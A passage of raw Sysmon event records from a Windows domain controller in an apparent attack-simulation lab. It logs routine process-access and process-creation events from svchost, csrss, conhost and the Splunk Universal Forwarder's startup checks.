12:02:55.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.364{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.364{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-E800-00000000AE01}4608C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.364{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EF-6064-E800-00000000AE01}4608C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.372{266CAFBE-64EF-6064-E800-00000000AE01}4608C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.333{266CAFBE-64EF-6064-E700-00000000AE01}62006388C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-E700-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-E700-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.083{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EF-6064-E700-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.090{266CAFBE-64EF-6064-E700-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-64EF-6064-E500-00000000AE01}64726484C:\Windows\system32\cmd.exe{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.077{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-64EF-6064-E500-00000000AE01}6472C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000008243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-E500-00000000AE01}6472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-E500-00000000AE01}6472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64EF-6064-E500-00000000AE01}6472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program 